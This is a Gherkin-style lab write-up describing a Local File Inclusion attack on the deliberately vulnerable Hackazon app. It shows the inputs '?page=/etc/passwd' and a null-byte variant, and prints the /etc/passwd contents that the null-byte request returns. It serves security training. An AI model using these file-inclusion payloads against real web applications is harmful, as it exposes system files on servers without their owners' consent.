# language: en

Feature: Local File Inclusion - URL
  From the Hackazon system
  Of the category A1: Injection
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /account/help_articles
    Message: Help
    Details:
      - A list of articles with three items
    Objective: Expose the LFI vulnerability in the web page
    """

  Scenario: Perform an LFI through the URL
    Given I select an article from the list and the URL is shown as follows
    """
    ?page=add_product_to_cart
    """
    When I change the value of page to '/etc/passwd' expecting to read the file
    """
    Input:  ?page=/etc/passwd
    Output: Error: 404 Not Found
            Please try to change your request.
    """
    Then it shows me an error, so it could be appending the extension at the end
    When I try again to get the file but this time adding at the end a null-byte
    """
    Input:  ?page=/etc/passwd%00
    Output: root:x:0:0:root:/root:/bin/bash
            daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
            bin:x:2:2:bin:/bin:/usr/sbin/nologin
            sys:x:3:3:sys:/dev:/usr/sbin/nologin
            sync:x:4:65534:sync:/bin:/bin/sync
            games:x:5:60:games:/usr/games:/usr/sbin/nologin
            man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
            lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
            mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
            news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
            uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
            proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
            www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
            ...
    """
    Then it prints out the content of the file and the passwords are shadowed
    But since the user 'www-data' doesn't have enough permissions
    And it's complicated to escalate privileges there's not much that I can do
